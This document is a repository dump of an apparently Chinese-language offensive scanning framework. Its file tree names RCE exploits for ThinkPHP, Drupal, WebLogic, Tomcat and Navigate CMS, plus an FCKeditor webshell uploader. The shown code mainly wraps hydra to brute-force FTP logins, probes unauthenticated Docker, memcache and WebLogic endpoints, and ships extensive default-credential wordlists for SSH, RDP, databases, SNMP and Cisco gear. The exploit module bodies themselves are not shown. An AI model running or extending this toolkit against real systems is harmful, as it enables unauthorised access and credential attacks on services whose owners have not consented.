├── iis
├── __init__.py
├── Main_iis.py
└── iis_shortname_Scan.py
├── bf_dicts
├── __init__.py
├── SMB-user.txt
├── POP3-user.txt
├── MySQL-user.txt
├── TOMCAT-user.txt
├── SSH-user.txt
├── TELNET-user.txt
├── RDP-user.txt
├── DB2-user.txt
├── FTP-user.txt
├── 通用-常见口令列表.txt
├── TOMCAT-passwd.txt
├── MONGODB-user.txt
├── Microsoft_SQL_Server-user.txt
├── 通用-常见用户名列表.txt
├── Main_bf.py
├── SYBASE-user.txt
├── SYBASE-passwd.txt
├── ORACLE-passwd.txt
├── ORACLE-user.txt
├── bf.py
├── Microsoft_SQL_Server-passwd.txt
├── SNMPpasswd.txt
├── CISCO-equitment-passwd.txt
├── DB2-passwd.txt
├── MySQL-passwd.txt
├── MONGODB-passwd.txt
├── POP3-passwd.txt
├── SMB-passwd.txt
├── FTP-passwd.txt
├── SSH-passwd.txt
├── RDP-passwd.txt
└── TELNET-passwd.txt
├── durpal
├── __init__.py
├── Main_durpal.py
├── CVE_2018_7600.py
└── CVE_2014_3704.py
├── jboss
├── __init__.py
├── Main_jboss.py
├── _updates.py
└── jexboss.py
├── js_find
├── __init__.py
├── Main_js_find.py
└── js_find.py
├── thinkphp
├── __init__.py
├── Main_thinkphp.py
├── thinkphp5_inj_info.py
├── thinkphp5_x_rce.py
└── thinkphp_before5_0_23_rce.py
├── tomcat
├── __init__.py
├── Main_tomcat.py
├── tomcat_weakpasswd.py
├── CVE_2017_12615.py
├── CVE_2017_12617.py
├── example_vulnerability.py
└── CVE_2020_1938.py
├── weblogic
├── __init__.py
├── ssrf.py
├── Main_weblogic.py
├── Common_page.py
├── weblogic_weakpasswd.py
├── CVE_2017_3506.py
├── CVE_2017_10271.py
├── CNVD_C_2019_48814.py
└── CVE_2018_2628.py
├── activemq_vuln
├── __init__.py
├── Main_activemq.py
├── ActiveMQ_uploadfile_cve_2016_3088.py
└── Activemq_weakpasswd.py
├── fckeditor
├── __init__.py
├── shell.asa
├── Main_fckeditor.py
├── fckeditor_version.py
├── fckeditor_dangerfile.py
└── fckeditor_getshell.py
├── gatepass_vuln
├── __init__.py
├── Main_gatepass.py
└── Gate_Pass_Management_System_login_SQL_Injection.py
├── kindeditor
├── __init__.py
├── Main_kindeditor.py
└── kindeditor_under_4_1_5_fileupload.py
├── navigate_vuln
├── __init__.py
├── 88.php
├── Main_navigate.py
└── navigate_Unauthenticated_Remote_Code_Execution_CVE_2018_17553.py
├── redis_vuln
├── __init__.py
├── Main_redis.py
└── redis_unauthorized.py
├── spring_vuln
├── __init__.py
├── Main_spring.py
└── CVE_2018_1273.py
├── zabbix_vuln
├── __init__.py
├── Main_zabbix.py
├── Authentication_Bypass.py
└── zabbix_sql_CVE_2016_10134.py
├── docker_vuln
├── __init__.py
├── Main_docker.py
└── docker_daemon_api.py
├── memcache_vuln
├── __init__.py
├── Main_memcache_vuln.py
└── memcache_un.py
├── search_exploits
├── __init__.py
├── Main_search_exploits.py
└── search_exploit.py
├── requirements.txt
├── .gitignore
├── .vscode
└── settings.json
├── README.md
└── moon.py
/iis/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
--------------------------------------------------------------------------------
/bf_dicts/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
--------------------------------------------------------------------------------
/durpal/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
--------------------------------------------------------------------------------
/jboss/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
--------------------------------------------------------------------------------
/js_find/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
--------------------------------------------------------------------------------
/thinkphp/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
--------------------------------------------------------------------------------
/tomcat/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
--------------------------------------------------------------------------------
/weblogic/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
--------------------------------------------------------------------------------
/activemq_vuln/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
--------------------------------------------------------------------------------
/fckeditor/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
--------------------------------------------------------------------------------
/gatepass_vuln/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
--------------------------------------------------------------------------------
/kindeditor/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
--------------------------------------------------------------------------------
/navigate_vuln/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
--------------------------------------------------------------------------------
/redis_vuln/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
--------------------------------------------------------------------------------
/spring_vuln/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
--------------------------------------------------------------------------------
/zabbix_vuln/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
--------------------------------------------------------------------------------
/docker_vuln/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
--------------------------------------------------------------------------------
/memcache_vuln/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
--------------------------------------------------------------------------------
/search_exploits/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
--------------------------------------------------------------------------------
/bf_dicts/SMB-user.txt:
--------------------------------------------------------------------------------
1 | Administrator
2 | Guest
3 | test
4 |
--------------------------------------------------------------------------------
/bf_dicts/POP3-user.txt:
--------------------------------------------------------------------------------
1 | desc
2 | test@example.com
3 | root@example.com
--------------------------------------------------------------------------------
/bf_dicts/MySQL-user.txt:
--------------------------------------------------------------------------------
1 | root
2 | mysql
3 | test
4 | user
5 | guest
6 |
--------------------------------------------------------------------------------
/bf_dicts/TOMCAT-user.txt:
--------------------------------------------------------------------------------
1 | admin
2 | tomcat
3 | both
4 | role1
5 | root
6 |
--------------------------------------------------------------------------------
/bf_dicts/SSH-user.txt:
--------------------------------------------------------------------------------
1 | root
2 | mysql
3 | oracle
4 | test
5 | user
6 | guest
7 |
--------------------------------------------------------------------------------
/bf_dicts/TELNET-user.txt:
--------------------------------------------------------------------------------
1 | administrator
2 | root
3 | admin
4 | test
5 | guest
6 |
--------------------------------------------------------------------------------
/bf_dicts/RDP-user.txt:
--------------------------------------------------------------------------------
1 | Administrator
2 | Guest
3 | test
4 | administrator
5 | admin
6 |
--------------------------------------------------------------------------------
/bf_dicts/DB2-user.txt:
--------------------------------------------------------------------------------
1 | db2inst1
2 | db2admin
3 | Administrator
4 | db2fenc1
5 | dasusr1
6 |
--------------------------------------------------------------------------------
/fckeditor/shell.asa:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1120362990/vulnerability-list/HEAD/fckeditor/shell.asa
--------------------------------------------------------------------------------
/navigate_vuln/88.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/bf_dicts/FTP-user.txt:
--------------------------------------------------------------------------------
1 | desc
2 | ftp
3 | root
4 | anonymous
5 | guest
6 | Administrator
7 | user
8 |
--------------------------------------------------------------------------------
/bf_dicts/通用-常见口令列表.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1120362990/vulnerability-list/HEAD/bf_dicts/通用-常见口令列表.txt
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | requests
2 | bs4
3 | requests_toolbelt
4 | docker
5 | redis
6 | python3-memcached
7 | lxml
8 | struct
9 | socket
--------------------------------------------------------------------------------
/bf_dicts/TOMCAT-passwd.txt:
--------------------------------------------------------------------------------
1 | admin
2 | tomcat
3 | 123
4 | 123456
5 | root
6 | fgh@#$
7 | qwe!@#
8 | admin123
9 | admin123456
10 |
--------------------------------------------------------------------------------
/bf_dicts/MONGODB-user.txt:
--------------------------------------------------------------------------------
1 | admin
2 | root
3 | user
4 | test
5 | accountAdmin01
6 | testuser
7 | accountUser
8 | reportsUser
9 | appAdmin
10 | mongouser
11 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | # Byte-compiled / optimized / DLL files
2 |
3 | __pycache__/
4 |
5 | *.py[cod]
6 |
7 | *$py.class
8 |
9 | *.xml
10 | *.iml
11 | *.log
12 | .vscode/settings.json
13 |
--------------------------------------------------------------------------------
/bf_dicts/Microsoft_SQL_Server-user.txt:
--------------------------------------------------------------------------------
1 | sa
2 | probe
3 | repl_publisher
4 | repl_subscriber
5 | distributor_admin
6 | admin
7 | Administrator
8 | guest
9 | test
10 | root
11 |
--------------------------------------------------------------------------------
/bf_dicts/通用-常见用户名列表.txt:
--------------------------------------------------------------------------------
1 | Administrator
2 | root
3 | test
4 | system
5 | admin
6 | administrator
7 | guest
8 | ftp
9 | user
10 | guest
11 | sa
12 | manager
13 | lp
14 | sys
15 | adm
16 |
--------------------------------------------------------------------------------
/js_find/Main_js_find.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import js_find.js_find
3 |
4 | def exec(URL):
5 | js_find.js_find.attack(URL)
6 |
7 |
8 | if __name__ == "__main__":
9 | exec()
10 |
--------------------------------------------------------------------------------
/.vscode/settings.json:
--------------------------------------------------------------------------------
1 | {
2 | "python.linting.flake8Enabled": true,
3 | "python.linting.pylintEnabled": false,
4 | "python.linting.enabled": true,
5 | "python.pythonPath": "C:\\python3\\python.exe"
6 | }
--------------------------------------------------------------------------------
/bf_dicts/Main_bf.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import bf_dicts.bf
3 |
4 |
5 | def exec(service,ip,port):
6 | bf_dicts.bf.attack(service,ip,port)
7 |
8 | if __name__ == "__main__":
9 | exec()
10 |
--------------------------------------------------------------------------------
/bf_dicts/SYBASE-user.txt:
--------------------------------------------------------------------------------
1 | admin
2 | Mon_user
3 | Dba
4 | entldbdbo
5 | entldbreader
6 | jagadmin
7 | PlAdmin
8 | pkiuser
9 | PortalAdmin
10 | pso
11 | dbo
12 | probe
13 | sybmail
14 | test
15 | sa
16 |
--------------------------------------------------------------------------------
/spring_vuln/Main_spring.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import spring_vuln.CVE_2018_1273
3 |
4 |
5 | def exec(URL):
6 | spring_vuln.CVE_2018_1273.attack(URL)
7 |
8 |
9 | if __name__ == "__main__":
10 | exec()
11 |
--------------------------------------------------------------------------------
/docker_vuln/Main_docker.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import docker_vuln.docker_daemon_api
3 |
4 |
5 | def exec(URL):
6 | docker_vuln.docker_daemon_api.attack(URL)
7 |
8 |
9 | if __name__ == "__main__":
10 | exec()
11 |
--------------------------------------------------------------------------------
/redis_vuln/Main_redis.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import redis_vuln.redis_unauthorized
3 |
4 |
5 | def exec(URL):
6 | redis_vuln.redis_unauthorized.attack(URL)
7 |
8 |
9 | if __name__ == "__main__":
10 | exec()
11 |
--------------------------------------------------------------------------------
/bf_dicts/SYBASE-passwd.txt:
--------------------------------------------------------------------------------
1 | abc123
2 | xiaoming
3 | iloveyou
4 | admin
5 | SQL
6 | dbopswd
7 | rdrpswd
8 | pkipasswd
9 | sybase
10 | fgh@#$
11 | 123qwe
12 | 123456
13 | 12345678
14 | 123
15 | qq123456
16 | taobao
17 | wang1234
18 |
--------------------------------------------------------------------------------
/search_exploits/Main_search_exploits.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import search_exploits.search_exploit
3 |
4 |
5 | def exec(URL):
6 | search_exploits.search_exploit.attack(URL)
7 |
8 |
9 | if __name__ == "__main__":
10 | exec()
11 |
--------------------------------------------------------------------------------
/memcache_vuln/Main_memcache_vuln.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import memcache_vuln.memcache_un
3 |
4 |
5 | def exec(URL):
6 | # memcahce_un.attack(URL)
7 | memcache_vuln.memcache_un.attack(URL)
8 |
9 |
10 | if __name__ == "__main__":
11 | exec()
12 |
--------------------------------------------------------------------------------
/kindeditor/Main_kindeditor.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import os
3 | import kindeditor.kindeditor_under_4_1_5_fileupload
4 |
5 |
6 | def exec(URL):
7 | kindeditor.kindeditor_under_4_1_5_fileupload.attack(URL)
8 |
9 |
10 |
11 |
12 | if __name__ == "__main__":
13 | exec()
14 |
--------------------------------------------------------------------------------
/gatepass_vuln/Main_gatepass.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import gatepass_vuln.Gate_Pass_Management_System_login_SQL_Injection
3 |
4 |
5 | def exec(URL):
6 | gatepass_vuln.Gate_Pass_Management_System_login_SQL_Injection.attack(URL)
7 |
8 |
9 | if __name__ == "__main__":
10 | exec()
11 |
--------------------------------------------------------------------------------
/bf_dicts/ORACLE-passwd.txt:
--------------------------------------------------------------------------------
1 | SYSTEM
2 | system
3 | 123456
4 | abc123
5 | xiaoming
6 | 12345678
7 | iloveyou
8 | admin
9 | qq123456
10 | taobao
11 | root
12 | wang1234
13 | MANAGER
14 | CHANGE_ON_INSTALL
15 | internal
16 | 123456
17 | 8888
18 | 888888
19 | 1234
20 | fgh@#$
21 | qwe!@#
22 |
--------------------------------------------------------------------------------
/durpal/Main_durpal.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import os
3 | import durpal.CVE_2014_3704
4 | import durpal.CVE_2018_7600
5 |
6 | def exec(URL):
7 | durpal.CVE_2014_3704.attack(URL)
8 | durpal.CVE_2018_7600.attack(URL)
9 |
10 |
11 |
12 |
13 | if __name__ == "__main__":
14 | exec()
15 |
--------------------------------------------------------------------------------
/navigate_vuln/Main_navigate.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import navigate_vuln.navigate_Unauthenticated_Remote_Code_Execution_CVE_2018_17553
3 |
4 |
5 | def exec(URL):
6 | navigate_vuln.navigate_Unauthenticated_Remote_Code_Execution_CVE_2018_17553.attack(URL)
7 |
8 |
9 | if __name__ == "__main__":
10 | exec()
11 |
--------------------------------------------------------------------------------
/zabbix_vuln/Main_zabbix.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import zabbix_vuln.zabbix_sql_CVE_2016_10134
3 | import zabbix_vuln.Authentication_Bypass
4 |
5 |
6 | def exec(URL):
7 | zabbix_vuln.zabbix_sql_CVE_2016_10134.attack(URL)
8 | zabbix_vuln.Authentication_Bypass.attack(URL)
9 |
10 |
11 | if __name__ == "__main__":
12 | exec()
13 |
--------------------------------------------------------------------------------
/bf_dicts/ORACLE-user.txt:
--------------------------------------------------------------------------------
1 | SYSTEM
2 | SYS
3 | DBSNMP
4 | SCOTT
5 | OUTLN
6 | MDSYS
7 | ORDSYS
8 | WKSYS
9 | OLAPDBA
10 | CTXSYS
11 | OLAPSYS
12 | ORDPLUGINS
13 | QS_CBADM
14 | demo
15 | ORACLE
16 | missys
17 | RMAN
18 | QS_OS
19 | QS_ES
20 | SH
21 | PM
22 | OE
23 | HR
24 | QS_WS
25 | QS
26 | QS_ADM
27 | QS_CS
28 | QS_CB
29 |
--------------------------------------------------------------------------------
/jboss/Main_jboss.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import os
3 | import jboss
4 |
5 |
6 | def exec(URL):
7 | print('[+]开始检测-jboss。[+]')
8 | # 切换工作路径
9 | os.chdir(os.path.realpath(__file__)[:35])
10 | os.system("py -2 jexboss.py -host "+URL)
11 | print('[+]检测结束-jboss。[+]')
12 |
13 |
14 | if __name__ == "__main__":
15 | exec()
16 |
--------------------------------------------------------------------------------
/activemq_vuln/Main_activemq.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import activemq_vuln.ActiveMQ_uploadfile_cve_2016_3088
3 | import activemq_vuln.Activemq_weakpasswd
4 |
5 |
6 | def exec(URL):
7 | activemq_vuln.Activemq_weakpasswd.attack(URL)
8 | activemq_vuln.ActiveMQ_uploadfile_cve_2016_3088.attack(URL)
9 |
10 |
11 | if __name__ == "__main__":
12 | exec()
13 |
--------------------------------------------------------------------------------
/iis/Main_iis.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import iis.iis_shortname_Scan
3 | import os
4 |
5 | def exec(URL):
6 | # print('[+]开始检测-IIS短文件名漏洞。[+]')
7 | # #切换工作路径
8 | # os.chdir('iis')
9 | # os.system("py -2 iis_shortname_Scan.py "+URL)
10 | # print('[+]检测完成-IIS短文件名漏洞。[+]')
11 |
12 | iis.iis_shortname_Scan.attack(URL)
13 |
14 | if __name__ == "__main__":
15 | exec()
16 |
--------------------------------------------------------------------------------
/thinkphp/Main_thinkphp.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import thinkphp.thinkphp5_inj_info
3 | import thinkphp.thinkphp5_x_rce
4 | import thinkphp.thinkphp_before5_0_23_rce
5 |
6 |
7 | def exec(URL):
8 | thinkphp.thinkphp5_inj_info.attack(URL)
9 | thinkphp.thinkphp5_x_rce.attack(URL)
10 | thinkphp.thinkphp_before5_0_23_rce.attack(URL)
11 |
12 |
13 | if __name__ == "__main__":
14 | exec()
15 |
--------------------------------------------------------------------------------
/fckeditor/Main_fckeditor.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import fckeditor.fckeditor_version
3 | import fckeditor.fckeditor_dangerfile
4 | import fckeditor.fckeditor_getshell
5 |
6 |
7 | def exec(URL):
8 | fckeditor.fckeditor_version.attack(URL)
9 | fckeditor.fckeditor_dangerfile.attack(URL)
10 | fckeditor.fckeditor_getshell.attack(URL)
11 |
12 |
13 | if __name__ == "__main__":
14 | exec()
15 |
--------------------------------------------------------------------------------
/bf_dicts/bf.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import docker
3 | import os
4 |
5 | '''
6 | hydra
7 | '''
8 |
9 |
10 | def attack(service,ip,port):
11 | if service == 'ftp':
12 | os.chdir('bf_dicts')
13 | os.system(f'hydra -L FTP-user.txt -P FTP-passwd.txt -V -s {port} {ip} {service}')
14 | else:
15 | print('Service for -'+service+'- not support!')
16 |
17 | print(service,ip,port)
18 |
19 |
20 |
21 |
22 | if __name__ == "__main__":
23 | attack()
24 |
--------------------------------------------------------------------------------
/search_exploits/search_exploit.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import requests
3 |
4 |
5 | def attack(URL):
6 | print(f'[+]开始在exploitalert中搜索 {URL} 存在的历史漏洞。')
7 | payload = {'name': URL}
8 | r = requests.get("https://www.exploitalert.com/api/search-exploit", params=payload)
9 | if r.text == '':
10 | print('未发现历史漏洞!')
11 | else:
12 | for json in r.json():
13 | print(json)
14 | print(f'[+]在exploitalert中搜索 {URL} 存在的历史漏洞结束。')
15 |
16 |
17 | if __name__ == "__main__":
18 | attack()
19 |
--------------------------------------------------------------------------------
/tomcat/Main_tomcat.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import tomcat.CVE_2017_12615
3 | import tomcat.example_vulnerability
4 | import tomcat.CVE_2017_12617
5 | import tomcat.tomcat_weakpasswd
6 | import tomcat.CVE_2020_1938
7 |
8 |
9 | def exec(URL):
10 | tomcat.example_vulnerability.attack(URL)
11 | tomcat.CVE_2017_12615.attack(URL)
12 | tomcat.CVE_2017_12617.attack(URL)
13 | tomcat.tomcat_weakpasswd.attack(URL)
14 | tomcat.CVE_2020_1938.attack(URL)
15 |
16 |
17 |
18 |
19 | if __name__ == "__main__":
20 | exec()
21 |
--------------------------------------------------------------------------------
/memcache_vuln/memcache_un.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import memcache
3 |
4 |
5 | def attack(URL):
6 | list = URL.split('/')
7 | try:
8 | print('[+]开始检测-memcache未授权访问漏洞。[+]')
9 | mc = memcache.Client([list[-1]], debug=True)
10 | print('[!]memcache获取信息结果:[!]')
11 | ret = mc.get_stats()
12 | print(ret)
13 | except:
14 | print('[-]未发现-发现-memcache未授权访问漏洞。[-]')
15 | pass
16 | print('[+]检测结束-memcache未授权访问漏洞。[+]')
17 |
18 |
19 | if __name__ == "__main__":
20 | attack()
21 |
--------------------------------------------------------------------------------
/bf_dicts/Microsoft_SQL_Server-passwd.txt:
--------------------------------------------------------------------------------
1 | password
2 | 0
3 | 1
4 | 2
5 | 3
6 | 4
7 | 5
8 | 6
9 | 7
10 | 8
11 | 9
12 | 123
13 | 456
14 | 1234
15 | 123456
16 | 123456
17 | 1212
18 | 12345678
19 | 23456789
20 | 246
21 | 249
22 | 369
23 | 777
24 | 888
25 | 7878
26 | 8787
27 | 8888
28 | 518
29 | 911
30 | 1022
31 | 92072
32 | 111111
33 | 121212
34 | 123123
35 | 123456
36 | Sa
37 | sA
38 | SA
39 | a12345
40 | a1b2c3
41 | a1b2c3d4
42 | fgh@#$
43 | qwe!@#
44 | aaa
45 | aaaaaa
46 | abby
47 | abc
48 | abc123
49 | ABC123
50 | abcd
51 | abcd1234
52 | abcde
53 | Abcdef
54 | abcdef
55 |
--------------------------------------------------------------------------------
/bf_dicts/SNMPpasswd.txt:
--------------------------------------------------------------------------------
1 | admin
2 | cisco
3 | netadmin
4 | private
5 | 1234
6 | root
7 | super
8 | router
9 | public
10 | pento
11 | password
12 | 123456
13 | sysadm
14 | default
15 | switch
16 | backdoor
17 | recovery
18 | secure
19 | anicust
20 | d.e.b.u.g
21 | ADTRAN
22 | installer
23 | surt
24 | NetICs
25 | adminttd
26 | D-Link
27 | tech
28 | private
29 | synnet
30 | adtran
31 | hello
32 | security
33 | guest
34 | smile
35 | support
36 | PASSWORD
37 | changeme2
38 | ascend
39 | netopia
40 | echo
41 | pass
42 | corecess
43 | Manager
44 | secret
45 | BRIDGE
46 | atc123
47 | Password
48 | superuser
49 | 123456
50 | emradmin
51 | 12345678
52 | 123qwe
53 | qwe123
54 | fgh@#$
55 |
--------------------------------------------------------------------------------
/bf_dicts/CISCO-equitment-passwd.txt:
--------------------------------------------------------------------------------
1 | admin
2 | cisco
3 | netadmin
4 | private
5 | 1234
6 | root
7 | super
8 | abc123
9 | router
10 | public
11 | pento
12 | password
13 | 123456
14 | sysadm
15 | default
16 | iloveyou
17 | qq123456
18 | taobao
19 | wang1234
20 | switch
21 | backdoor
22 | recovery
23 | secure
24 | anicust
25 | d.e.b.u.g
26 | ADTRAN
27 | installer
28 | surt
29 | NetICs
30 | adminttd
31 | D-Link
32 | tech
33 | private
34 | synnet
35 | adtran
36 | hello
37 | security
38 | guest
39 | smile
40 | support
41 | PASSWORD
42 | changeme2
43 | ascend
44 | netopia
45 | echo
46 | pass
47 | corecess
48 | Manager
49 | secret
50 | BRIDGE
51 | atc123
52 | Password
53 | superuser
54 | 123456
55 | emradmin
56 | 12345678
57 |
--------------------------------------------------------------------------------
/docker_vuln/docker_daemon_api.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import docker
3 |
4 |
5 | '''
6 | Usage:
7 | moon.py -u docker_vuln http://127.0.0.1:2375
8 | 此漏洞默认存在2375端口上-nmap扫描结果- 2375/tcp open docker
9 | 贴一个漏洞介绍,可能拿shell:https://blog.csdn.net/qq_33020901/article/details/78685447
10 | '''
11 |
12 |
13 | def attack(URL):
14 | print('[+]开始检测-Docker-docker_daemon_api未授权访问。[+]')
15 | try:
16 | client = docker.DockerClient(base_url=URL)
17 |
18 | print('获取到的容器列表:'+str(client.containers.list()))
19 | print('[+]存在漏洞,连接成功!!!')
20 | except Exception:
21 | print('[-]连接失败,漏洞不存在。')
22 | print('[+]检测完成-Docker-docker_daemon_api未授权访问。[+]')
23 | print('\n')
24 |
25 |
26 | if __name__ == "__main__":
27 | attack()
28 |
--------------------------------------------------------------------------------
/bf_dicts/DB2-passwd.txt:
--------------------------------------------------------------------------------
1 |
2 | 123
3 | 123123
4 | 123456
5 | 12345678
6 | !@#
7 | !@#$%^
8 | !@#$%^&*
9 | 111111
10 | 666666
11 | abc
12 | test
13 | 888888
14 | fgh@#$
15 | 123321
16 | |+_)(
17 | Admin123
18 | 88888888
19 | 66666666
20 | test123
21 | master
22 | admin
23 | root
24 | 11111111
25 | 000000
26 | 8888
27 | 6666
28 | 123!@#
29 | 00000000
30 | 1234567
31 | aaaaaa
32 | 654321
33 | 999999
34 | 222222
35 | password
36 | abcdefg
37 | woaini
38 | iloveyou
39 | exit
40 | 99999999
41 | 333333
42 | 444444
43 | 555555
44 | 6543210
45 | 111222
46 | asdfghjkl
47 | abc123
48 | 666888
49 | zzzzzz
50 | abcd1234
51 | 1234
52 | 12345
53 | abcd
54 | abcde
55 | abcdef
56 | abcdefg
57 | abcdefgh
58 | abcdefghi
59 | Admin123
60 | 123qwe
61 | qazwsx
62 | qweasd
63 | asdfjkl;
64 | `1234567890-=
65 | 1234567890-=
66 | !@#$%^&*()_+
67 | ~!@#$%^&*()_+
--------------------------------------------------------------------------------
/bf_dicts/MySQL-passwd.txt:
--------------------------------------------------------------------------------
1 | 123
2 | 123123
3 | 123456
4 | 12345678
5 | !@#
6 | !@#$%^
7 | !@#$%^&*
8 | 111111
9 | 666666
10 | abc
11 | test
12 | 888888
13 | fgh@#$
14 | qwe!@#
15 | 123321
16 | |+_)(
17 | Admin123
18 | 88888888
19 | 66666666
20 | 111111
21 | guest
22 | test123
23 | master
24 | admin
25 | root
26 | 11111111
27 | 000000
28 | 8888
29 | 6666
30 | 123!@#
31 | 00000000
32 | 1234567
33 | aaaaaa
34 | 654321
35 | 999999
36 | 222222
37 | password
38 | abcdefg
39 | woaini
40 | iloveyou
41 | exit
42 | 99999999
43 | 333333
44 | 444444
45 | 555555
46 | 999999
47 | 000000
48 | 00000000
49 | 6543210
50 | 111222
51 | asdfghjkl
52 | abc123
53 | 666888
54 | zzzzzz
55 | abcd1234
56 | Guest123
57 | 1234
58 | 12345
59 | ab
60 | abcd
61 | abcde
62 | abcdef
63 | abcdefg
64 | abcdefgh
65 | abcdefghi
66 | Admin123
67 | 123qwe
68 | qazwsx
69 | qweasd
70 | asdfjkl;
71 | `1234567890-=
72 | 1234567890-=
73 | !@#$%^&*()_+
74 | ~!@#$%^&*()_+
75 |
--------------------------------------------------------------------------------
/bf_dicts/MONGODB-passwd.txt:
--------------------------------------------------------------------------------
1 |
2 | 123
3 | 123123
4 | 123456
5 | 12345678
6 | !@#
7 | !@#$%^
8 | !@#$%^&*
9 | 111111
10 | 666666
11 | abc
12 | test
13 | 888888
14 | 123321
15 | |+_)(
16 | changeMe
17 | Admin123
18 | testpass
19 | 88888888
20 | 66666666
21 | 111111
22 | guest
23 | test123
24 | master
25 | admin
26 | root
27 | 11111111
28 | 000000
29 | 8888
30 | 6666
31 | 123!@#
32 | 00000000
33 | 1234567
34 | aaaaaa
35 | 654321
36 | 999999
37 | 222222
38 | password
39 | abcdefg
40 | woaini
41 | iloveyou
42 | exit
43 | 99999999
44 | 333333
45 | 444444
46 | 555555
47 | 999999
48 | 000000
49 | 00000000
50 | 6543210
51 | 111222
52 | asdfghjkl
53 | abc123
54 | 666888
55 | zzzzzz
56 | abcd1234
57 | Guest123
58 | 1234
59 | 12345
60 | ab
61 | abcd
62 | abcde
63 | abcdef
64 | abcdefg
65 | abcdefgh
66 | abcdefghi
67 | Admin123
68 | 123qwe
69 | qazwsx
70 | qweasd
71 | asdfjkl;
72 | `1234567890-=
73 | 1234567890-=
74 | !@#$%^&*()_+
75 | ~!@#$%^&*()_+
--------------------------------------------------------------------------------
/weblogic/ssrf.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | import requests
4 |
5 | '''
6 | Usage:
7 | moon.py -u weblogic http://127.0.0.1:7001
8 | weblogic version: 10.0.2,10.3.6
9 | 修复:uddiexplorer 删除该目录下的文件,或者做权限配置,禁止对外访问。
10 | 如果可登陆,可在 Setup UDDI Explorer 处获得明确的内网IP
11 | '''
12 | def attack(URL):
13 | print('[+]开始检测-Weblogic-ssrf-CVE-2014-4210。[+]')
14 |
15 | url = f'{URL}/uddiexplorer/'
16 | headers = {"Content-Type":'text/xml',
17 | "User-Agent":'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'}
18 | try:
19 | r = requests.get(url, headers=headers)
20 | if r.status_code == 200:
21 | print("存在weblogic-ssrf漏洞页面:"+url)
22 | else:
23 | print("[-]未发现漏洞页面。")
24 | except requests.exceptions.ConnectionError:
25 | print('[-]访问页面出错!')
26 | print('[+]检测结束-Weblogic-ssrf-CVE-2014-4210。[+]')
27 | print('\n')
28 |
29 |
30 | if __name__ == "__main__":
31 | attack()
32 |
--------------------------------------------------------------------------------
/bf_dicts/POP3-passwd.txt:
--------------------------------------------------------------------------------
1 | 123
2 | 123123
3 | 123456
4 | 12345678
5 | test
6 | xiaoming
7 | !@#
8 | !@#$%^
9 | !@#$%^&*
10 | 111111
11 | 666666
12 | abc
13 | 888888
14 | qq123456
15 | taobao
16 | wang1234
17 | 123321
18 | |+_)(
19 | Admin123
20 | 88888888
21 | 66666666
22 | 111111
23 | guest
24 | test123
25 | master
26 | admin
27 | root
28 | 11111111
29 | 000000
30 | 8888
31 | 6666
32 | 123!@#
33 | 00000000
34 | 1234567
35 | aaaaaa
36 | 654321
37 | 999999
38 | 222222
39 | password
40 | abcdefg
41 | woaini
42 | iloveyou
43 | exit
